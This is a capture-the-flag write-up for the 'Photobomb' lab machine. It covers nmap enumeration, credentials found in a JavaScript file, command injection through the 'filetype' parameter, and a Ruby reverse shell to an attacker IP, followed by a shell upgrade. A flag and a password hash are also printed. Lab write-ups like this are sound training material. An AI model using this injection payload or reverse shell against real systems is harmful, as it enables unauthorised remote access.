Photobomb

, ,

  • inital SYN nmap scan shows two open ports

    sudo nmap -sS -oA nmap/initial_scan 10.129.165.17
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-18 10:44 EST
    Nmap scan report for 10.129.165.17
    Host is up (0.12s latency).
    Not shown: 998 closed tcp ports (reset)
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http

    Nmap done: 1 IP address (1 host up) scanned in 2.48 seconds

  • second nmap scan using default script shows port 80 redirects to photobomb.htb

    sudo nmap -sV -sC -oA nmap/default_script_scan 10.129.165.17
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
    | 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
    |_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
    80/tcp open http nginx 1.18.0 (Ubuntu)
    |_http-title: Did not follow redirect to http://photobomb.htb/
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • added photobomb.htb to /etc/hosts

  • another nmap scan using http-enum script to enumarate common directories on port 80

    sudo nmap -sV –script=http-enum -oA nmap/http_enum_scan -p 80 10.129.165.17
    PORT STATE SERVICE VERSION
    80/tcp open http nginx 1.18.0 (Ubuntu)
    |http-server-header: nginx/1.18.0 (Ubuntu)
    | http-enum:
    | /printer/image: Lexmark Printer (401 Unauthorized)
    | /printer/: Potentially interesting folder (401 Unauthorized)
    |     /printers/: Potentially interesting folder (401 Unauthorized)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • going to /printer we see it is password protected

•using whatweb to see what technologies the web app uses

whatweb photobomb.htb
http://photobomb.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], 
IP[10.129.165.17], Script, Title[Photobomb], UncommonHeaders[x-content-type-options], 
X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block], nginx[1.18.0]

  • ran full tcp nmap scan to see if there any other open ports – there were none

  • viewing source of homepage we see photobomb.js which includes credentials for /printer

    pH0t0:b0Mb!
    username: pH0t0
    password: b0Mb!

  • we run burpe to intercept image download from /printer

  • we see it sending 3 variables: photo, filetype and dimension

  • if we put ; after filetype we can get ruby RCE

    ruby -rsocket -e’spawn(“sh”,[:in,:out,:err]=>TCPSocket.new(“10.10.14.36”,9000))’

  • so we change data from burpe to

    photo=wolfgang-hasselmann-RLEgmd1O7gs-unsplash.jpg&filetype=jpg;ruby -rsocket -e’spawn(“sh”,[:in,:out,:err]=>TCPSocket.new(“10.10.14.36”,9000))’&dimensions=3000x2000

  • upgrade shell

    python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

  • we can get user flag now: ecb6bbe9e8cd2a2aba478e7c85779f48

  • found .htpasswd in /home/wizard/photobomb

    pH0t0:$apr1$dnyF00ZD$9PifZwUxL/J0BCS/wTShU1

  • typing sudo -l we see we can run a script using root without a password